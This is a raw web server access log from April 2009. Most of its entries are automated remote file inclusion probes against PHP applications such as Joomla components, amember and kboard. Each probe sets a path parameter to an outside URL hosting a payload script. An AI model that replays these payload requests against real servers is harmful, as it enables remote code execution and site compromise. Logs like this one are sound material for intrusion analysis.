195.116.31.151 - - [27/Apr/2009:08:26:58 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:08:26:58 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
62.58.32.74 - - [27/Apr/2009:08:35:52 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:08:35:52 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:08:35:52 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:08:37:11 -0500] "GET /logs/access_log.1231804800//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:08:37:57 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:08:37:58 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:08:38:02 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
62.58.32.74 - - [27/Apr/2009:08:40:22 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:08:40:22 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:08:40:22 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.214.53.125 - - [27/Apr/2009:08:41:22 -0500] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:08:41:22 -0500] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
200.103.16.43 - - [27/Apr/2009:08:45:45 -0500] "GET /logs//?path%5Bdocroot%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 187156 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:08:45:46 -0500] "GET //?path%5Bdocroot%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
70.86.169.162 - - [27/Apr/2009:08:46:03 -0500] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:08:46:03 -0500] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
65.55.208.131 - - [27/Apr/2009:08:46:57 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [27/Apr/2009:08:46:58 -0500] "GET /logs/access_log.1191542400 HTTP/1.1" 200 1611 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [27/Apr/2009:08:47:00 -0500] "GET /logs/access_log.1118448000 HTTP/1.1" 200 661 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [27/Apr/2009:08:47:00 -0500] "GET /logs/access_log.1159747200 HTTP/1.1" 200 656 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.176.226.100 - - [27/Apr/2009:08:47:16 -0500] "GET /logs//errors.php?error=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.176.226.100 - - [27/Apr/2009:08:47:17 -0500] "GET //errors.php?error=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:08:48:03 -0500] "GET /logs//?path%5Bdocroot%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 187156 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:08:48:03 -0500] "GET //?path%5Bdocroot%5D=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
217.172.186.250 - - [27/Apr/2009:08:48:35 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:08:48:35 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:08:48:35 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:08:50:48 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:08:50:48 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
206.104.21.154 - - [27/Apr/2009:08:53:56 -0500] "GET /logs/access_log.1231200000//displayCategory.php?basepath=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
206.104.21.154 - - [27/Apr/2009:08:53:56 -0500] "GET /logs//displayCategory.php?basepath=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
206.104.21.154 - - [27/Apr/2009:08:53:56 -0500] "GET //displayCategory.php?basepath=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.137.160.91 - - [27/Apr/2009:08:54:00 -0500] "GET /logs/access_log.1228608000%20%20////?_SERVER[DOCUMENT_ROOT]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.137.160.91 - - [27/Apr/2009:08:54:00 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
195.137.160.91 - - [27/Apr/2009:08:54:01 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 187158 "-""Mozilla/5.0"
204.200.195.110 - - [27/Apr/2009:08:55:29 -0500] "GET /logs//componets/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://payudara.fileave.com/cmd.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
204.200.195.110 - - [27/Apr/2009:08:55:29 -0500] "GET //componets/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://payudara.fileave.com/cmd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
206.104.21.154 - - [27/Apr/2009:08:57:33 -0500] "GET /logs/access_log.1232841600//displayCategory.php?basepath=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.147.30.80 - - [27/Apr/2009:09:00:42 -0500] "GET /logs/show.php?path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
217.147.30.80 - - [27/Apr/2009:09:00:42 -0500] "GET /logs/show.php?path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
217.147.30.80 - - [27/Apr/2009:09:00:43 -0500] "GET /show.php?path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
217.147.30.80 - - [27/Apr/2009:09:00:43 -0500] "GET /show.php?path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
91.121.112.152 - - [27/Apr/2009:09:00:46 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
91.121.112.152 - - [27/Apr/2009:09:00:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
78.129.214.105 - - [27/Apr/2009:09:01:28 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.129.214.105 - - [27/Apr/2009:09:01:28 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.129.214.105 - - [27/Apr/2009:09:01:28 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.129.214.105 - - [27/Apr/2009:09:02:28 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
78.129.214.105 - - [27/Apr/2009:09:02:28 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
78.129.214.105 - - [27/Apr/2009:09:02:28 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
74.55.30.194 - - [27/Apr/2009:09:03:53 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:03:53 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:03:53 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:05:35 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:09:05:35 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:09:05:35 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.38.243.71 - - [27/Apr/2009:09:06:45 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.243.71 - - [27/Apr/2009:09:06:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.38.243.71 - - [27/Apr/2009:09:06:45 -0500] "GET /logs/access_log.1239753600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:09:12:27 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Apr/2009:09:12:27 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
85.214.53.125 - - [27/Apr/2009:09:14:57 -0500] "GET //skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:14:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:17:38 -0500] "GET //skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:17:38 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:17:38 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
70.86.169.162 - - [27/Apr/2009:09:20:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:09:20:09 -0500] "GET //skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
200.103.16.43 - - [27/Apr/2009:09:20:19 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
200.103.16.43 - - [27/Apr/2009:09:20:19 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
168.209.97.34 - - [27/Apr/2009:09:20:27 -0500] "GET //include/bbs.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:09:20:27 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:09:20:27 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.214.53.125 - - [27/Apr/2009:09:20:47 -0500] "GET /logs/access_log.1234137600//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
168.209.97.34 - - [27/Apr/2009:09:21:15 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
70.86.169.162 - - [27/Apr/2009:09:21:31 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:09:21:31 -0500] "GET //skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:09:21:31 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:09:21:41 -0500] "GET /logs/access_log.1234137600//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
85.214.53.125 - - [27/Apr/2009:09:22:00 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:22:00 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
202.190.70.69 - - [27/Apr/2009:09:22:06 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.825"
202.190.70.69 - - [27/Apr/2009:09:22:07 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.825"
149.156.18.19 - - [27/Apr/2009:09:22:08 -0500] "GET /logs//mwchat/libs/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:09:22:11 -0500] "GET //mwchat/libs/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
74.55.30.194 - - [27/Apr/2009:09:22:21 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:09:22:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:22:22 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:22:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:09:22:29 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:09:22:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
70.86.169.162 - - [27/Apr/2009:09:22:48 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:09:22:48 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
91.121.112.152 - - [27/Apr/2009:09:22:58 -0500] "GET /logs/home.php?index=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
91.121.112.152 - - [27/Apr/2009:09:22:58 -0500] "GET /home.php?index=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:23:05 -0500] "GET /logs/access_log.1226448000//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:23:08 -0500] "GET /logs/access_log.1230681600//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
85.214.53.125 - - [27/Apr/2009:09:23:09 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
70.247.250.222 - - [27/Apr/2009:09:23:48 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:09:23:48 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.75.4.169 - - [27/Apr/2009:09:23:49 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
70.247.250.222 - - [27/Apr/2009:09:23:49 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.75.4.169 - - [27/Apr/2009:09:23:49 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.69.106.77 - - [27/Apr/2009:09:26:41 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
200.69.106.77 - - [27/Apr/2009:09:26:41 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
203.94.228.43 - - [27/Apr/2009:09:29:23 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://r0xcrew.netsons.org/cortez/dos/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
203.94.228.43 - - [27/Apr/2009:09:29:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://r0xcrew.netsons.org/cortez/dos/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
62.58.32.74 - - [27/Apr/2009:09:29:29 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:09:29:29 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:09:29:29 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
62.58.32.74 - - [27/Apr/2009:09:29:34 -0500] "GET /logs/access_log.1231804800//skin/zero_vote/ask_password.php?dir=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:09:29:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:09:29:54 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
69.64.34.249 - - [27/Apr/2009:09:30:46 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:09:30:46 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
70.86.169.162 - - [27/Apr/2009:09:31:09 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
70.86.169.162 - - [27/Apr/2009:09:31:14 -0500] "GET /logs/access_log.1226448000//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
195.116.31.151 - - [27/Apr/2009:09:31:31 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:09:31:31 -0500] "GET //mambots/content/multithumb/errors.php?error=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
70.86.169.162 - - [27/Apr/2009:09:31:36 -0500] "GET /logs/access_log.1230681600//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
